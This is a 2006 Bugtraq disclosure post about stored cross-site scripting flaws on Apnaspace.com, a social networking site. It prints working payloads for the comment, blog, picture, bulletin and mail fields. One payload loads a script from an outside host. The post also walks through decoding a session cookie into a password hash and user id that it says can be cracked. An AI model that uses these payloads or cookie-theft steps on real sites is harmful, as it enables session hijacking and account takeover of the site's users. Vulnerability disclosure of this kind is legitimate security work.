Apnaspace.com - XSS with cookie disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Apnaspace.com - XSS with cookie disclosure
From: luny@xxxxxxxxxxxxxxx
Date: 12 Jun 2006 23:28:28 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Apnaspace.com (A myspace type site for arab & indian teens)

Homepage:
http://www.http://www.apnaspace.com

Effected files:

* Comment input box:

* Posting a blog entry:
- Entry title
- Entry body

* Viewing a profile

* Posting a bulletin.

* Commenting on a picture

* Sending mail to someone
------------------------------------------------------

XSS vuln with cookie disclosure via posting a comment:

Since there a vulnerability in bbcode 1.23.1 and below, we can execute our XSS 
example and display the cookie info by putting the following in as a comment:

[img]javascript:alert(document.cookie)[/img]

This also works when creating a new blog entry too. Just put the above 
codeinasyour"entry title" or "entry subject"

Screenshots:
http://www.youfucktard.com/xsp/apna1.jpg
http://www.youfucktard.com/xsp/apna2.jpg

Our Cookie:

TIME=1150153432; switchmenu; 
apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D;
 apnaforum_sid=2964cbd2c5a3f3d1a911fbf777c32300; 
NATIO=luny666;__utma=265362911.794893539.1150148238.1150148238.1150151884.2; 
__utmc=265362911; 
__utmz=265362911.1150148238.1.1.utmccn=(referral|utmcsr=dmoz.org|utmcct=/Recreation/Picture_Ratings/|utmcmd=referral;
 __utmb=265362911


The cookie looks pretty much the same as a few of the others I've discussed. 
I'll just post whats needed:

Dcoding the Hex value of:

apnaforum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%223462%22%3B%7D;

We get:

a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:4:"3462";}

What we need:

91da4589b012c2fe1ceac1fb2363dbc6 (Our md5 hashed password, which is fuckit)

Our userid is:3462

Now lets godown to NATIO=luny666 (This is our username)

Congrats, you now know the md5 hashed pw, which can be cracked, as well as our 
username from this cookie. Lets move on to other parts of the site that suffer 
from XSS vulns.

---------------------------------------------

Posting a bulletin XSS vuln:

When postinga bulletin, userinput is not sanatized and filtered before being 
generated. So, unlike above, where we had to use the sites standard bbcode 
tags,  we can just use normal html tags here. For PoC when submitting a 
bulletin, try putting <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> in as 
your bulletin subject.

Screenshots:
http://www.youfucktard.com/xsp/apna3.jpg
http://www.youfucktard.com/xsp/apna4.jpg
http://www.youfucktard.com/xsp/apna5.jpg

----------------------------------------------

Commenting on a picture:

Same ast he first XSS vuln, we use bbcode here. ForPoC try putting the 
following in as your comment when rating a picture:

[img]javascript:alert(document.cookie)[/img]

Screenshots:
http://www.youfucktard.com/xsp/apna6.jpg
http://www.youfucktard.com/xsp/apna7.jpg

-------------------------------------------------

Sending someone mail:

No filtering is needed here,for PoC as your mail title or subject just put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

---------------------------------------------------

Prev by Date: XSS in GardenWeb
Next by Date: Re: SSL VPNs and security
Previous by thread: XSS in GardenWeb
Next by thread: hi5.com - XSS with cookie disclosure
Index(es):
- Date
- Thread